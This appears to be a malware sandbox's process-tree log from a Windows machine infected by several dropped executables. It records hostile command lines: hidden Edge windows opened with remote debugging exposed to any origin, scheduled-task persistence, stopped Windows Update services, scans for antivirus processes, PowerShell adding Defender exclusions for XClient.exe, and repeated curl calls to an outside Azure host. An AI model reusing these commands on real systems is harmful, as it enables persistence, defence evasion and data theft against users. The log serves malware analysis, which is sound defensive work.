C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations=is-enterprise-managed=no --extension-process --enable-dinosaur-easter-egg-alt-images --no-sandbox --remote-debugging-port=9222 --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=3676,i,10036548141638847266,7960079924346170776,262144 --variations-seed-version --mojo-platform-channel-handle=3688 /prefetch:96⤵
- Uses browser remote debugging
PID:7536
-
-
-
C:\Windows\SYSTEM32\taskkill.exetaskkill /F /IM msedge.exe5⤵
- Kills process with taskkill
PID:10040
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:/Program Files (x86)/Microsoft/Edge/Application/msedge.exe" --remote-debugging-port=9222 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox5⤵
- Uses browser remote debugging
PID:9160 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffa7d7b3cb8,0x7ffa7d7b3cc8,0x7ffa7d7b3cd86⤵PID:7712
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1332,1049279029522894426,2439371322841798936,131072 --lang=uk --service-sandbox-type=none --no-sandbox --mojo-platform-channel-handle=1928 /prefetch:36⤵PID:760
-
-
-
C:\Windows\SYSTEM32\taskkill.exetaskkill /F /IM msedge.exe5⤵
- Kills process with taskkill
PID:9512
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:/Program Files (x86)/Microsoft/Edge/Application/msedge.exe" --remote-debugging-port=9222 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox5⤵
- Uses browser remote debugging
PID:5332 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffa7d7b3cb8,0x7ffa7d7b3cc8,0x7ffa7d7b3cd86⤵PID:8700
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1964,9497672926823893976,17228137069694617268,131072 --no-sandbox --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --use-gl=swiftshader-webgl --mojo-platform-channel-handle=2020 /prefetch:26⤵PID:2020
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1964,9497672926823893976,17228137069694617268,131072 --lang=uk --service-sandbox-type=none --no-sandbox --mojo-platform-channel-handle=2072 /prefetch:36⤵PID:7284
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1964,9497672926823893976,17228137069694617268,131072 --lang=uk --service-sandbox-type=utility --no-sandbox --mojo-platform-channel-handle=2348 /prefetch:86⤵PID:864
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --no-sandbox --remote-debugging-port=9222 --field-trial-handle=1964,9497672926823893976,17228137069694617268,131072 --disable-gpu-compositing --lang=uk --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3336 /prefetch:16⤵
- Uses browser remote debugging
PID:2164
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --no-sandbox --remote-debugging-port=9222 --field-trial-handle=1964,9497672926823893976,17228137069694617268,131072 --disable-gpu-compositing --lang=uk --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3348 /prefetch:16⤵
- Uses browser remote debugging
PID:6172
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --no-sandbox --remote-debugging-port=9222 --field-trial-handle=1964,9497672926823893976,17228137069694617268,131072 --disable-gpu-compositing --lang=uk --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4452 /prefetch:16⤵
- Uses browser remote debugging
PID:7244
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --no-sandbox --remote-debugging-port=9222 --field-trial-handle=1964,9497672926823893976,17228137069694617268,131072 --disable-gpu-compositing --lang=uk --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4472 /prefetch:16⤵
- Uses browser remote debugging
PID:6264
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\JJSploit_8.10.7_x64-setup.exe"C:\Users\Admin\AppData\Local\Temp\Files\JJSploit_8.10.7_x64-setup.exe"3⤵PID:6868
-
-
C:\Users\Admin\AppData\Local\Temp\Files\random.exe"C:\Users\Admin\AppData\Local\Temp\Files\random.exe"3⤵PID:9224
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c start cmd /C "ping localhost -n 1 && start C:\Users\Admin\AppData\Local\kreon.exe"4⤵
- System Network Configuration Discovery: Internet Connection Discovery
PID:5780 -
C:\Windows\system32\cmd.execmd /C "ping localhost -n 1 && start C:\Users\Admin\AppData\Local\kreon.exe"5⤵
- System Network Configuration Discovery: Internet Connection Discovery
PID:9668 -
C:\Windows\system32\PING.EXEping localhost -n 16⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:9560
-
-
C:\Users\Admin\AppData\Local\kreon.exeC:\Users\Admin\AppData\Local\kreon.exe6⤵PID:7288
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\maza-0.16.3-win32-setup-unsigned.exe"C:\Users\Admin\AppData\Local\Temp\Files\maza-0.16.3-win32-setup-unsigned.exe"3⤵PID:10100
-
-
C:\Users\Admin\AppData\Local\Temp\Files\built.exe"C:\Users\Admin\AppData\Local\Temp\Files\built.exe"3⤵PID:8016
-
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Local\Temp\Files\built.exe" /rl HIGHEST /f4⤵
- Scheduled Task/Job: Scheduled Task
PID:5048
-
-
-
-
C:\Windows\system32\taskmgr.exe"C:\Windows\system32\taskmgr.exe" /02⤵
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:2432
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc2⤵
- Suspicious use of WriteProcessMemory
PID:468 -
C:\Windows\System32\sc.exesc stop UsoSvc3⤵
- Launches sc.exe
PID:2364
-
-
C:\Windows\System32\sc.exesc stop WaaSMedicSvc3⤵
- Launches sc.exe
PID:1028
-
-
C:\Windows\System32\sc.exesc stop wuauserv3⤵
- Launches sc.exe
PID:3472
-
-
C:\Windows\System32\sc.exesc stop bits3⤵
- Launches sc.exe
PID:4752
-
-
C:\Windows\System32\sc.exesc stop dosvc3⤵
- Launches sc.exe
PID:1948
-
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 02⤵
- Power Settings
- Suspicious use of WriteProcessMemory
PID:4544 -
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-ac 03⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:3272
-
-
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-dc 03⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:2044
-
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-ac 03⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:3064
-
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-dc 03⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:3332
-
-
-
C:\Windows\System32\conhost.exeC:\Windows\System32\conhost.exe2⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:3620
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe"2⤵PID:1432
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe"3⤵
- Checks processor information in registry
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:500 -
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=1992 -parentBuildID 20240401114208 -prefsHandle 1924 -prefMapHandle 1904 -prefsLen 23678 -prefMapSize 244658 -appDir "C:\Program Files\Mozilla Firefox\browser" - {c6d308db-b95c-4693-8d99-8acb2616af43} 500 "\\.\pipe\gecko-crash-server-pipe.500" gpu4⤵PID:1256
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2396 -parentBuildID 20240401114208 -prefsHandle 2388 -prefMapHandle 2376 -prefsLen 23714 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {eccfcc11-0663-4a24-b8a9-9a708e46aaf8} 500 "\\.\pipe\gecko-crash-server-pipe.500" socket4⤵PID:3188
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2960 -childID 1 -isForBrowser -prefsHandle 3196 -prefMapHandle 3300 -prefsLen 23855 -prefMapSize 244658 -jsInitHandle 1304 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {96c4c230-02aa-45fc-92fe-38ffa575f9c3} 500 "\\.\pipe\gecko-crash-server-pipe.500" tab4⤵PID:1424
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3560 -childID 2 -isForBrowser -prefsHandle 3468 -prefMapHandle 3476 -prefsLen 29088 -prefMapSize 244658 -jsInitHandle 1304 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {09ca3658-c92b-4db2-b63f-4f20a93f4c48} 500 "\\.\pipe\gecko-crash-server-pipe.500" tab4⤵PID:4844
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2548 -parentBuildID 20240401114208 -sandboxingKind 0 -prefsHandle 4492 -prefMapHandle 4616 -prefsLen 29088 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {11e339f5-a25f-4aa6-8a04-f8d3384032af} 500 "\\.\pipe\gecko-crash-server-pipe.500" utility4⤵
- Checks processor information in registry
PID:2476
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5320 -childID 3 -isForBrowser -prefsHandle 5192 -prefMapHandle 5180 -prefsLen 26944 -prefMapSize 244658 -jsInitHandle 1304 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {fe4714da-b229-4f82-a626-d63f6a84c46f} 500 "\\.\pipe\gecko-crash-server-pipe.500" tab4⤵PID:576
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5452 -childID 4 -isForBrowser -prefsHandle 5460 -prefMapHandle 5464 -prefsLen 26944 -prefMapSize 244658 -jsInitHandle 1304 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {27371bdc-0e55-4e54-ad39-ccab7f7f0cdc} 500 "\\.\pipe\gecko-crash-server-pipe.500" tab4⤵PID:1104
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5664 -childID 5 -isForBrowser -prefsHandle 5620 -prefMapHandle 5436 -prefsLen 26944 -prefMapSize 244658 -jsInitHandle 1304 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {6230255a-c4b9-4dc1-9123-21774689e73b} 500 "\\.\pipe\gecko-crash-server-pipe.500" tab4⤵PID:548
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5988 -childID 6 -isForBrowser -prefsHandle 5460 -prefMapHandle 5972 -prefsLen 27132 -prefMapSize 244658 -jsInitHandle 1304 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {cfe9773e-2232-483c-9e85-e5cfb5d8330b} 500 "\\.\pipe\gecko-crash-server-pipe.500" tab4⤵PID:2672
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5308 -childID 7 -isForBrowser -prefsHandle 5340 -prefMapHandle 5344 -prefsLen 27211 -prefMapSize 244658 -jsInitHandle 1304 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {cccb0c80-309b-422f-9646-344531657445} 500 "\\.\pipe\gecko-crash-server-pipe.500" tab4⤵PID:2484
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=6484 -parentBuildID 20240401114208 -prefsHandle 6344 -prefMapHandle 6468 -prefsLen 29355 -prefMapSize 244658 -appDir "C:\Program Files\Mozilla Firefox\browser" - {1b77eb6f-7097-4a65-8f81-0cf01f3d0fd6} 500 "\\.\pipe\gecko-crash-server-pipe.500" rdd4⤵PID:3312
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=6492 -parentBuildID 20240401114208 -sandboxingKind 1 -prefsHandle 6480 -prefMapHandle 6476 -prefsLen 29355 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {8f0df7c8-dfdf-446c-8f3a-0223bf81fd4f} 500 "\\.\pipe\gecko-crash-server-pipe.500" utility4⤵
- Checks processor information in registry
PID:756
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=6788 -childID 8 -isForBrowser -prefsHandle 6772 -prefMapHandle 6756 -prefsLen 27211 -prefMapSize 244658 -jsInitHandle 1304 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {5e786528-defd-4a20-8915-32e0cf74d43b} 500 "\\.\pipe\gecko-crash-server-pipe.500" tab4⤵PID:3176
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=6916 -childID 9 -isForBrowser -prefsHandle 6924 -prefMapHandle 6928 -prefsLen 27211 -prefMapSize 244658 -jsInitHandle 1304 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {b1cbee69-00a8-4baf-8be8-cb10a63bf8bc} 500 "\\.\pipe\gecko-crash-server-pipe.500" tab4⤵PID:3556
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\519810010.exe"C:\Users\Admin\AppData\Local\Temp\519810010.exe"2⤵
- Executes dropped EXE
PID:3472
-
-
C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe"C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe"2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:5660 -
C:\Users\Admin\AppData\Local\Temp\Files\injectorOld.exe"C:\Users\Admin\AppData\Local\Temp\Files\injectorOld.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:2828 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c cls4⤵PID:5204
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\Discord.exe"C:\Users\Admin\AppData\Local\Temp\Files\Discord.exe"3⤵
- Suspicious use of SetWindowsHookEx
PID:6088 -
C:\Users\Admin\AppData\Local\Temp\Files\Discord.exe"C:\Users\Admin\AppData\Local\Temp\Files\Discord.exe"4⤵
- Loads dropped DLL
- Suspicious use of SetWindowsHookEx
PID:6528
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\Setup.exe"C:\Users\Admin\AppData\Local\Temp\Files\Setup.exe"3⤵
- Drops startup file
- Adds Run key to start application
- Suspicious use of SetThreadContext
PID:2272 -
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM4⤵
- Drops file in Drivers directory
PID:6612
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\MePaxil.exe"C:\Users\Admin\AppData\Local\Temp\Files\MePaxil.exe"3⤵
- Suspicious use of SetWindowsHookEx
PID:2240 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /k move Offensive Offensive.cmd & Offensive.cmd & exit4⤵PID:2104
-
C:\Windows\SysWOW64\tasklist.exetasklist5⤵
- Enumerates processes with tasklist
PID:3188
-
-
C:\Windows\SysWOW64\findstr.exefindstr /I "wrsa.exe opssvc.exe"5⤵PID:4372
-
-
C:\Windows\SysWOW64\tasklist.exetasklist5⤵
- Enumerates processes with tasklist
PID:1560
-
-
C:\Windows\SysWOW64\findstr.exefindstr /I "avastui.exe avgui.exe bdservicehost.exe ekrn.exe nswscsvc.exe sophoshealth.exe"5⤵PID:1316
-
-
C:\Windows\SysWOW64\cmd.execmd /c md 5436485⤵PID:4988
-
-
C:\Windows\SysWOW64\findstr.exefindstr /V "BiddingVeRoutinesFilms" Bowling5⤵
- System Location Discovery: System Language Discovery
PID:4292
-
-
C:\Windows\SysWOW64\cmd.execmd /c copy /b ..\Suzuki + ..\Major + ..\Tit + ..\Adjust + ..\Invest + ..\Severe + ..\Sony + ..\Prefers E5⤵
- System Location Discovery: System Language Discovery
PID:1236
-
-
C:\Users\Admin\AppData\Local\Temp\543648\Legend.pifLegend.pif E5⤵
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:3520 -
C:\Windows\SysWOW64\cmd.execmd /c schtasks.exe /create /tn "Keyboard" /tr "wscript //B 'C:\Users\Admin\AppData\Local\ThreatGuard Innovations\ScanGuard.js'" /sc daily /mo 1 /ri 3 /du 23:57 /F /RL HIGHEST6⤵
- System Location Discovery: System Language Discovery
PID:4804 -
C:\Windows\SysWOW64\schtasks.exeschtasks.exe /create /tn "Keyboard" /tr "wscript //B 'C:\Users\Admin\AppData\Local\ThreatGuard Innovations\ScanGuard.js'" /sc daily /mo 1 /ri 3 /du 23:57 /F /RL HIGHEST7⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:3304
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks.exe /create /tn "ScanGuard" /tr "wscript //B 'C:\Users\Admin\AppData\Local\ThreatGuard Innovations\ScanGuard.js'" /sc onlogon /F /RL HIGHEST6⤵
- Scheduled Task/Job: Scheduled Task
PID:1124
-
-
-
C:\Windows\SysWOW64\choice.exechoice /d y /t 155⤵
- System Location Discovery: System Language Discovery
PID:4380
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\ttl.exe"C:\Users\Admin\AppData\Local\Temp\Files\ttl.exe"3⤵PID:3096
-
C:\Users\Admin\AppData\Local\Temp\Files\ttl.exe"C:\Users\Admin\AppData\Local\Temp\Files\ttl.exe"4⤵PID:5884
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "curl -m 10 --header "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101" "http://spvmoslv.brazilsouth.cloudapp.azure.com/?m=Vqokpqkq""5⤵PID:3880
-
C:\Windows\system32\curl.execurl -m 10 --header "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101" "http://spvmoslv.brazilsouth.cloudapp.azure.com/?m=Vqokpqkq"6⤵PID:8140
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "curl -m 10 --header "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101" "http://spvmoslv.brazilsouth.cloudapp.azure.com/?m=Vqokpqkq""5⤵PID:2444
-
C:\Windows\system32\curl.execurl -m 10 --header "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101" "http://spvmoslv.brazilsouth.cloudapp.azure.com/?m=Vqokpqkq"6⤵PID:7440
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "curl -m 10 --header "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101" "http://spvmoslv.brazilsouth.cloudapp.azure.com/?m=Vqokpqkq""5⤵PID:5864
-
C:\Windows\system32\curl.execurl -m 10 --header "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101" "http://spvmoslv.brazilsouth.cloudapp.azure.com/?m=Vqokpqkq"6⤵PID:6420
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "curl -m 10 --header "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101" "http://spvmoslv.brazilsouth.cloudapp.azure.com/?m=Vqokpqkq""5⤵PID:9564
-
C:\Windows\system32\curl.execurl -m 10 --header "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101" "http://spvmoslv.brazilsouth.cloudapp.azure.com/?m=Vqokpqkq"6⤵PID:9644
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "curl -m 10 --header "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101" "http://spvmoslv.brazilsouth.cloudapp.azure.com/?m=Vqokpqkq""5⤵PID:8972
-
C:\Windows\system32\curl.execurl -m 10 --header "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101" "http://spvmoslv.brazilsouth.cloudapp.azure.com/?m=Vqokpqkq"6⤵PID:9488
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "curl -m 10 --header "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101" "http://spvmoslv.brazilsouth.cloudapp.azure.com/?m=Vqokpqkq""5⤵PID:9752
-
C:\Windows\system32\curl.execurl -m 10 --header "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101" "http://spvmoslv.brazilsouth.cloudapp.azure.com/?m=Vqokpqkq"6⤵PID:9228
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "curl -m 10 --header "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101" "http://spvmoslv.brazilsouth.cloudapp.azure.com/?m=Vqokpqkq""5⤵PID:5780
-
C:\Windows\system32\curl.execurl -m 10 --header "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101" "http://spvmoslv.brazilsouth.cloudapp.azure.com/?m=Vqokpqkq"6⤵PID:6540
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "curl -m 10 --header "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101" "http://spvmoslv.brazilsouth.cloudapp.azure.com/?m=Vqokpqkq""5⤵PID:7312
-
C:\Windows\system32\curl.execurl -m 10 --header "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101" "http://spvmoslv.brazilsouth.cloudapp.azure.com/?m=Vqokpqkq"6⤵PID:9840
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "curl -m 10 --header "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101" "http://spvmoslv.brazilsouth.cloudapp.azure.com/?m=Vqokpqkq""5⤵PID:8264
-
C:\Windows\system32\curl.execurl -m 10 --header "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101" "http://spvmoslv.brazilsouth.cloudapp.azure.com/?m=Vqokpqkq"6⤵PID:7460
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\S%D0%B5tup.exe"C:\Users\Admin\AppData\Local\Temp\Files\S%D0%B5tup.exe"3⤵PID:6616
-
-
C:\Users\Admin\AppData\Local\Temp\Files\Unit.exe"C:\Users\Admin\AppData\Local\Temp\Files\Unit.exe"3⤵PID:6296
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6296 -s 4484⤵
- Program crash
PID:8804
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\Client-built.exe"C:\Users\Admin\AppData\Local\Temp\Files\Client-built.exe"3⤵PID:9336
-
-
C:\Users\Admin\AppData\Local\Temp\Files\winbox.exe"C:\Users\Admin\AppData\Local\Temp\Files\winbox.exe"3⤵PID:1772
-
-
-
C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe"C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe"2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:4044 -
C:\Users\Admin\AppData\Local\Temp\Files\XClient.exe"C:\Users\Admin\AppData\Local\Temp\Files\XClient.exe"3⤵
- Drops startup file
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:3360 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Files\XClient.exe'4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:5952
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'XClient.exe'4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:5740
-
-
